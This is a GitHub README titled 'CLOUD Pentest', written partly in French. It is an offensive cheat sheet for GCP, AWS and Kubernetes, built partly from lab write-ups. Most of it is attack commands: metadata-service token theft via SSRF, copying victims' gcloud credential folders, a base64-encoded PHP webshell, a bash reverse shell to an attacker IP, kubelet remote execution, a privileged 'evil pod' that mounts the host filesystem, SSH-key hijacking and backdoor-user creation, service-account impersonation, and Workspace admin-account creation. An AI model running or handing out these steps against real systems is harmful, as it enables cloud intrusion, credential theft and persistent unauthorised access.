Skip to content

scamwork/GCP-Pentest

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CLOUD Pentest

GENERAL METHODOLOGY :

  • Benchmark checks
    • understand the size of the environemnet and service used
    • quick misconfiguration as you can perform
  • Service Enumeration
    • what is exactyl being used in the cloud env
  • Check exposed service
  • Check permissions
  • Check integrations

Mindmap pentest GCP : Mindmap pentest GCP

GCP compromission PATH : GCP compromission PATH MITRE ATTACK MITRE ATTACK FROM INITIAL ACCESS TO PERSISTENCE COMPARAISON AWS/AZURE/GCP GCP AZURE AWS

Google Cloud Platform CLI Tool Cheatsheet

By Beau Bullock (@dafthack)

Authentication

Authentication with gcloud

#user identity login
gcloud auth login

#service account login
gcloud auth activate-service-account --key-file creds.json*

List accounts available to gcloud

gcloud auth list

Account Information

Get account information

gcloud config list

List organizations

gcloud organizations list

Enumerate IAM policies set ORG-wide

gcloud organizations get-iam-policy <org ID>

Enumerate IAM policies set per project

gcloud projects get-iam-policy <project ID>

List projects

gcloud projects list

Set a different project

gcloud config set project <project name> 

Gives a list of all APIs that are enabled in project

gcloud services list

Get source code repos available to user

gcloud source repos list

Clone repo to home dir

gcloud source repos clone <repo_name>

Virtual Machines

List compute instances

gcloud compute instances list

Get shell access to instance

gcloud beta compute ssh --zone "<region>" "<instance name>" --project "<project name>"

Puts public ssh key onto metadata service for project

gcloud compute ssh <local host>

Get access scopes if on an instance

curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H &#39;Metadata-Flavor:Google’

Use Google keyring to decrypt encrypted data

gcloud kms decrypt --ciphertext-file=encrypted-file.enc --plaintext-file=out.txt --key <crypto-key> --keyring <crypto-keyring> --location global

Storage Buckets

List Google Storage buckets

gsutil ls

List Google Storage buckets recursively

gsutil ls -r gs://<bucket name>

Copy item from bucket

gsutil cp gs://bucketid/item ~/

Webapps & SQL

List WebApps

gcloud app instances list

List SQL instances

gcloud sql instances list
gcloud spanner instances list
gcloud bigtable instances list

List SQL databases

gcloud sql databases list --instance <instance ID>
gcloud spanner databases list --instance <instance name>

Export SQL databases and buckets

First copy buckets to local directory

gsutil cp gs://bucket-name/folder/ .

Create a new storage bucket, change perms, export SQL DB

gsutil mb gs://<googlestoragename>
gsutil acl ch -u <service account> gs://<googlestoragename>
gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --database=<database name>

Networking

List networks

gcloud compute networks list

List subnets

gcloud compute networks subnets list

List VPN tunnels

gcloud compute vpn-tunnels list

List Interconnects (VPN)

gcloud compute interconnects list

Containers

gcloud container clusters list

GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with gcloud and run:

gcloud container clusters get-credentials <cluster name> --region <region>

If successful and the user has the correct permission the Kubernetes command below can be used to get cluster info:

kubectl cluster-info

Serverless

GCP functions log analysis – May get useful information from logs associated with GCP functions

gcloud functions list
gcloud functions describe <function name>
gcloud functions logs read <function name> --limit <number of lines>

GCP Cloud Run analysis – May get useful information from descriptions such as environment variables.

gcloud run services list
gcloud run services describe <service-name>
gcloud run revisions describe --region=<region> <revision-name>

Gcloud stores creds in ~/.config/gcloud/credentials.db Search home directories

sudo find /home -name "credentials.db

Copy gcloud dir to your own home directory to auth as the compromised user

sudo cp -r /home/username/.config/gcloud ~/.config
sudo chown -R currentuser:currentuser ~/.config/gcloud
gcloud auth list

Metadata Service URL

curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"

BILBIOGRAPHIE

TUTORIALS

LABS

TOOLS

AWS CHEAT SHEET & CAS PRATIQUES

Handy articles :

WEBSHELL

$ cat ~/.aws/credentials
$ echo -n PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pgo= | base64 -d > /tmp/shell.php
$ aws s3api list-buckets => bucket 
$ aws s3 cp <file> s3://website/
payload = webshell > bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.14.10/4000+0%3E%261%27

Payload in php file :

<?php system(\$_REQUEST['cmd']); ?>

AWS LAMBDA FUNCTIONS

$ aws configure --profile <profileName>

$ aws lambda list-functions --profile <profileName> --endpoint-url http://cloud.epsilon.htb

$ aws lambda get-function --function-name "costume_shop_v1" --query 'Code.Location' --profile uploadcreds  --endpoint-url http://cloud.epsilon.htb
 > <URL_CODE>

$ wget -O lambda-function.zip <URL_CODE>

S3 BUCKET ENUM

$ aws configure 
 random
 random
 eu-west-1
 random 
 
$ aws --endpoint-url http://s3.DN.com s3 ls nameserver

Upload smth => 
$ aws s3 --endpoint-url http://s3.DN.com cp . s3://websiteserver --recursive

IF LOCAL RESTRICTION 
=> Chisel 
--------------------
./chisel server -p 9001 --reverse => on kali machine
./chisel client {IP_ATTACKER}:9001 R:1234:{IP_TARGET_SERVICE}:{TARGET_PORT}

then 

$ aws dynamodb list-tables --endpoint-url http://localhost:4566


$ aws --endpoint-url http://localhost:1234 dynamodb scan --table-name users | jq -r '.Items[]

AZURE CHEAT SHEET & CAS PRATIQUES

Handy articles :

KUBERNETES CHEAT SHEET & CAS PRATIQUES

KUBELETCTL

$ wget https://github.com/cyberark/kubeletctl/releases/download/v1.9/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl

kubeletctl is a scan for RCE in a pod open node etc ...

PORT 10250

=> responsable de la gestion des conteneurs et des pods sur ce nœud. /pods /pods => curl -sk https://10.10.11.133:10250/pods | jq ' .items[].metadata.name'

certificate etc...

can see what pods is in the node and control the cert

PORT 8443

with the cert can add a pod for example (kubectl)

SCAN PODS

$ kubeletctl pods --server 10.10.11.133

SCAN RCE

scan RCE :
   $ kubeletctl scan rce --server 10.10.11.133
if vulnerable : 
   $ kubeletctl --server 10.10.11.133 exec "/bin/bash"  -p nginx -c nginx
   TO GET a shell

ESPACE FROM A POD

enum for : /run/secrets/kubernetes.io/serviceaccount /var/run/secrets/kubernetes.io/serviceaccount /secrets/kubernetes.io/serviceaccount

get token + ca.crt

get token =>

$ export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)

get configuration YAML in pod nginx here =>

$ kubectl get pod nginx -o yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

connect to API with Kubectl to add a pod for example (here in port 8443) :

$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods

DEVIL YAML to escape :

apiVersion: v1 
kind: Pod
metadata:
  name: 0xdf-pod
  namespace: default
spec:
  containers:
  - name: 0xdf-pod
    image: nginx:1.14.2 # !! (retrieved from get configuration YAML) !!
    # securityContext:
      privileged: true # didnt try but can allow to have root access on the host
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /  # !! (can mount from / on the host , here is the devil !! >:O) !!
  automountServiceAccountToken: true
  hostNetwork: true

add the pod =>

$ kubectl apply -f evil-pod.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

connect to the pod :
kubeletctl --server 10.10.11.133 exec "/bin/bash"  -p 0xdf-pod  -c 0xdf-pod

got to /mnt and access to / of the host

Par défaut, lorsqu'un pod est créé sans spécifier de securityContext, il est exécuté avec les droits du compte de service qui execute le pod si on spécifie securityContext : privileged : true => le pod sera executé avec un compte de service qui gère l'execution des nodes (et pod dedans) dans un cluster, avec le securit context, il aura les droits privilégiés (root) sur l'hôte depuis /mnt

GCP CHEAT SHEET & PRIVESC

Learning

HACKTRICKS

PAYLOAD ALL THE THINGS

LABS

(For azure: Visualize attack surface - Stormspotter => bloohhound for azure)

You need a foothold on the machine as a shell or SSRF with OAuth token SSRF

AWESOME GCP PENTESTING

BASIC INFORMATIONS

In order to audit a GCP environment it's very important to know: which services are being used, what is being exposed, who has access to what, and how are internal GCP services an external services connected.

GAIN ACCESS

FOOTHOLD


OBTAIN SOME CREDENTIALS

  • Leaks in github (OSINT)
  • Social Engineering
  • Password reuse (from password leaks)
  • Vulnerbabilities in GCP-Hostd Application like
    • **Server Side Request Forgery** with access to metadata endpoint for exemple **/computeMetadata/v1/project/numeric-project-id**
    • Local file Read
      • linux : /home/USERNAME/.config/gcloud/*
      • windows : C:\Users\USERNAME\.config\gcloud\*
    • 3rd parties breached
    • Internal Employee
  • Leak key.json file with private key and auth to a service account ?
  • compromising an unauthenticated service exposed with cloudscraper [Unauthenticated enum](https://cloud.hacktricks.xyz/pentesting-cloud/gcp-pentesting/gcp-unauthenticated-enum)
  • For a pentest : just ask for enough credentials

SSRF

SSRF

SSRF seems to be a good entry point then access to local metadata link

SEE ALL THE META DATA of the compute engine : 

http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text
Header : Metadata-Flavor: Google

--------------------------
# /project
# Project name and number
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
# Project attributes
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true

# /oslogin
# users
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/users
# groups
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/groups
# security-keys
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/security-keys
# authorize
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/authorize

# /instance
# Description
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
# Hostname
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
# ID
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
# Image
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
# Machine Type
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/machine-type
# Name
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name
# Tags
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags
# Zone
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone
# User data
curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
# Network Interfaces
for iface in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do 
    echo "  IP: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
    echo "  Subnetmask: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
    echo "  Gateway: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
    echo "  DNS: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
    echo "  Network: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
    echo "  ==============  "
done
# Service Accounts
for sa in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do 
    echo "  Name: $sa"
    echo "  Email: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/email")
    echo "  Aliases: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases")
    echo "  Identity: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity")
    echo "  Scopes: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes")
    echo "  Token: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token")
    echo "  ==============  "
done
# K8s Attributtes
## Cluster location
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
## Cluster name
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
## Os-login enabled
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
## Kube-env
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-env
## Kube-labels
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
## Kubeconfig
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig

LINK WITH INTERESTING ENDPOINTS TO TEST

BUCKET ENUM

Bucket policy

https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update

Unauthenticated Enum

Unauthenticated Enum


GCPBucketBrute --> Enumerate Google Storage Bucket (what access i have to them from my current account, and determine if they can be privilege escalated, if no creds are entered you will only be shown the privileged )

Cloud enum OSINT --> OSINT TOOL enumerating open / protected GCP buckets, firebase realtime database, google app engine sites, etc...

Scout Suite -> present a clear view of the attack surface

GCM -> list all IAM role permission

Firewall Enum -> enumarte instance with nework port exposed

ATTACK GOOGLE KUBERNETES ENGINES

Kuebernetes != Compute engine

Compute engine is completly unmanaged whereas Kubernetes has automatic updates etc...

container / cluster etc..

TOOL PrivES FOR AFTER FOOLTHOLD

PRIVESC

GCPLOIT -> list of tools mentioned in this talk https://www.youtube.com/watch?v=Ml09R38jpok

GCP Scanner -> what level of access certain credentials posses on GCP, evaluate impact of a OAuth2 token for exemple

Purple Panda -> identify privilege esclation paths and dangerous permissions

https://www.youtube.com/watch?v=zl5NdvoWHX4 => John Hammond

TECHNICS LOCAL PRIVILEGE ESCALATION

TALK => Lateral Movement & Privilege Escalation

Follow the scripts

You can have granular permission on a specific instance. gsutil ls doesnt work but gsutil ls gs://instance823............ works !

but how to know the name "instance823" ? bruteforce ? no. this instance is probabily used in a script, read scripts too is a good way to understand waht the machine is meant to do.

Add SSH key to custom metadata

with a service account, modify metadata and escalate to root with ssh public key added to a privileged account

Modify public key of an account (HIJACK)

if alice has a public key like

alice 123219042.........pk alice make => a new public key and insert it alice alice Attack by replacing alice public key by oursleves with adding it new file is like : alice:publickey alice bob:publickey bob alice: alice

access alice account with :

$ ssh -i ./<ATTACKER PRIVATE KEY> alice@localhost

Create a new privilege user

create a new user give him sudo rights

# define the new account username
NEWUSER="definitelynotahacker"

# create a key
ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""

# create the input meta file
NEWKEY="$(cat ./key.pub)"
echo "$NEWUSER:$NEWKEY" > ./meta.txt

# update the instance metadata
gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt

# ssh to the new account
ssh -i ./key "$NEWUSER"@localhost

Grant sudo to an existing session

gcloud compute ssh [INSTANCE NAME]

generate ssh key, add it to existing user, add your existing user is the google-sudousers group

OS Login

OS login permet de lier un compte google a l'acces SSH d'une instance

Cmd control ssh acces :

  • roles/compute.osLogin (no sudo)
  • roles/compute.osAdminLogin (has sudo)

Lateral Movement

After compromsing a VM let's go some more...

Get list of all instance in the current projet : gcloud compute instances list

without the Block projet-wide SSH-keys param abuse by the technic saw previously

Network config

Firewall may be more permissive for internal IP addresses

List all subnets :

$ gcloud compute networks subnets list

List all external/internal ip of a compute instance :

$ gcloud compute instances list

!! NMAP IS NOTICED BY GOOGLE !!

List all the port open to the world

maybe a breach in other app could allow to pivot (weak password SSH or RDP) like default admin password too

0.0.0.0/0 => all port allowed from the public internet

tool => gcp_firewall_enum

Cloud privilege escalation

# First, get the numeric organization ID
$ gcloud organizations list

# Then, enumerate the policies
$ gcloud organizations get-iam-policy [ORG ID]

BYPASSING ACCESS SCOPE OF THE OAuth token account

  • find another box with less restrictive access scopes
  • gcloud compute instances list --quiet --format=json

Access scope are just limited to OAuth requests...

Connection without OAuth :

  • Put RSA public key on the host (public key authentication)

Looking if any service account have had key files exported :

$ for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
    echo Looking for keys for $i:
    gcloud iam service-accounts keys list --iam-account $i
done

In this file you have private key You can reauthenticte with a service account with this private key : $ gcloud auth activate-service-account --key-file [FILE]

test your now OAuth token to test its scope :

$ TOKEN=`gcloud auth print-access-token`
$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN

Inspect the box (a higher user could have used this machine)

sudo find / -name "gcloud"

copy all gcloud folder to a machine i contorl and run gcloud auth list to see what account are now available

Service account impersonation

Three ways :

  • Authentication using RSA private keys
  • Authorization using Cloud IAM policies
  • Deployings jobs on a Google Cloud Platform services

Find a service account with Owner right, and elevate then our google account to a project you want. the --impersonate-service-account allow you to impersonnate any account

# View available service accounts
$ gcloud iam service-accounts list

# Impersonate the account
$ gcloud compute instances list \
    --impersonate-service-account [email protected]

Verify the compromised account project list

$ gcloud projects list

hop to that project and start the entire process again :

$ gcloud config set project [PROJECT-ID]

Granting access to management console

GCP management console is provided only to user account not service account

grant access to a gmail account

$ gcloud projects add-iam-policy-binding [PROJECT] \
    --member user:[EMAIL] --role roles/editor

Spreading to GSUITE

Service accounts in GCP can be granted the rights to programatically access user data in G Suite by impersonating legitimate users. This is known as domain-wide delegation. This includes actions like reading email in GMail, accessing Google Docs, and even creating new user accounts in the G Suite organizatio

look at the :

domain wide delegation column => Enabled

  • get creds of a service account with G suite permission put it in credentials.json
  • impersonate a user with admin access, and then use access reset a password

access admin console

# Validate access only
$ ./gcp_delegation.py --keyfile ./credentials.json \
    --impersonate [email protected] \
    --domain target-org.com

# List the directory
$ ./gcp_delegation.py --keyfile ./credentials.json \
    --impersonate [email protected] \
    --domain target-org.com \
    --list

# Create a new admin account
$ ./gcp_delegation.py --keyfile ./credentials.json \
    --impersonate [email protected] \
    --domain target-org.com \
    --account pwned

EXTRACT DATA Treasure hunting

Accessing databases

  • Cloud SQL
  • Cloud Spanner
  • Cloud Bigtable
  • Cloud Firestore
  • Firebase

Commands ton enum & identify databases targets accross the project

# Cloud SQL
$ gcloud sql instances list
$ gcloud sql databases list --instance [INSTANCE]

# Cloud Spanner
$ gcloud spanner instances list
$ gcloud spanner databases list --instance [INSTANCE]

# Cloud Bigtable
$ gcloud bigtable instances list

if sql is exposed => mysql -u root -h

Enumerating storage buckets

don't forget that storage bucket can have secrets inside

# List all storage buckets in project
$ gsutil ls

# Get detailed info on all buckets in project
$ gsutil ls -L

# List contents of a specific bucket (recursive, so careful!)
$ gsutil ls -r gs://bucket-name/

# Cat the context of a file without copying it locally
$ gsutil cat gs://bucket-name/folder/object

# Copy an object from the bucket to your local storage for review
$ gsutil cp gs://bucket-name/folder/object ~/

CIPHER FILE

It is possible de see decyption keys in a keyrings, the best practise is to see in doc/script how the decryption, and encryption is done

DISPLAY METADATA

# view project metadata
$ curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
    -H "Metadata-Flavor: Google"

# view instance metadata
$ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
    -H "Metadata-Flavor: Google"

Review custom images

query non standard image wich may contains sensitives informations : $ gcloud compute images list --no-standard-images then export the virtual disk from image in order to build it locally in a VM for further investigations : $ gcloud compute images export --image test-image \ --export-format qcow2 --destination-uri [BUCKET]

Reviewing Custom instance Templates

Deploy consistent configurations => can find sensitive informations in it too to investigate :

# List the available templates
$ gcloud compute instance-templates list

# Get the details of a specific template
$ gcloud compute instance-templates describe [TEMPLATE NAME]

Reviewing cloud functions

Reviewing cloud Git repositories

# enumerate what's available
$ gcloud source repos list

# clone a repo locally
$ gcloud source repos clone [REPO NAME]

Searching the local system for secrets

commands to find some secrets once on the system :

TARGET_DIR="/path/to/whatever"

# Service account keys
grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
    "$TARGET_DIR"

# Legacy GCP creds
grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
    "$TARGET_DIR"

# Google API keys
grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
    "$TARGET_DIR"

# Google OAuth tokens
grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
    "$TARGET_DIR"

# Generic SSH keys
grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
    "$TARGET_DIR"

# Signed storage URLs
grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
    "$TARGET_DIR"

# Signed policy documents in HTML
grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
    "$TARGET_DIR"

DIVERS

impossible de savoir IP VM à partir de seul URL (tester dig et nslookup mais en général la stratégie google fait que on rentre l'URL et google redirige vers la VM et renvoie les résultats mais accède peut être jamais directement à l'IP de la VM donc chaud de savoir ce que c'est)

Summary

=> Remarque : proteger son compte Google est aussi une bonne pratique, si le compte google est accédé, le shell du projet avec les autorisations associés sont aussi evidemment accessible...

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published